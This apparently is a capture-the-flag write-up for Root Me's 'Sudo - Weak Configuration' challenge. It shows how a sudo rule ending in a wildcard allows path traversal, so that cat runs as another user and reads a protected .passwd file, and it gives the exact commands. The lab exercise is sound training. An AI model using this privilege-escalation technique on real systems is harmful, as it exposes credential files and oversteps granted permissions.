sabato 6 ottobre 2018

RootMe - CTF App Security - Sudo - Weak Configuration

Let's come back to the second challenge of


Root Me allows us to practice with a lot of challenges, classified in arguments: App - Script, App - System, Cracking, Cryptanalysis, Forensic, Network, Programming, Realist, Steganography, Web - Client, Web - Server.

Let's start with the first category: App - Script.

The second challenge that we face is: Sudo - Weak Configuration:

Vulnerability type:
  • Privilege Escalation by Sudo weak configuration

##################################################

In this challenge, on the current directory we have two directories ch1 and ch1cracked and one readme.md file.
If we read the readme.md file, the content says that the .passwd is located to /challenge/app-script/ch1/ch1cracked/.
If I try to cd ch1cracked, I will get permission error so I cannot access. By ls -la we see that only app-script-ch1-cracked can access to that folder.

We need to check by sudo command what command and on which locations our user (app-script-ch1) could execute as app-script-ch1-cracked user.

To to this, we type:
  • sudo -l
and we get:
Matching Defaults entries for app-script-ch1 on challenge02:


    env_reset,



    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,



    !mail_always, !mail_badpass, !mail_no_host, !mail_no_perms,



    !mail_no_user



User app-script-ch1 may run the following commands on challenge02:



    (app-script-ch1-cracked) /bin/cat /challenge/app-script/ch1/ch1/*
Focus on the last two rows: our user can execute cat command working on /challenge/app-script/ch1/ch1 folder as app-script-ch1-cracked user. You can see the * at the end, this allows us to append everything we want. For example we could replace the * with ../ or append a whole path.

To access to the ch1cracked folder and to the .passwd file, type:
  • cd ch1
  • sudo -u app-script-ch1-cracked cat /challenge/app-script/ch1/ch1/../ch1cracked/.passwd
or
  • cd ch1
  • sudo -u app-script-ch1-cracked cat /challenge/app-script/ch1/ch1/ ../ch1cracked/.passwd
or
  • cd ch1
  • sudo -u app-script-ch1-cracked cat /challenge/app-script/ch1/ch1/shared_notes /challenge/app-script/ch1/ch1cracked/.passwd
In this way, we execute the cat command as the app-script-ch1-cracked user. 
IMPORTANT: the input directory MUST BE an absolute path, and we must pass through /challenge/app-script/ch1/ch1 directory before to reach our target file .passwd otherwise we get permission error.
On the second option above, the allowed directory must finish with '/'.

Entering this command, it asks for app-script-ch1 password, so we insert app-script-ch1 as password (the same that we used to log by SSH at the start of the challenge).

We will get the solution.


Pubblicato da alle
Etichette: , , , ,

Nessun commento:

Posta un commento

Iscriviti a: Commenti sul post (Atom)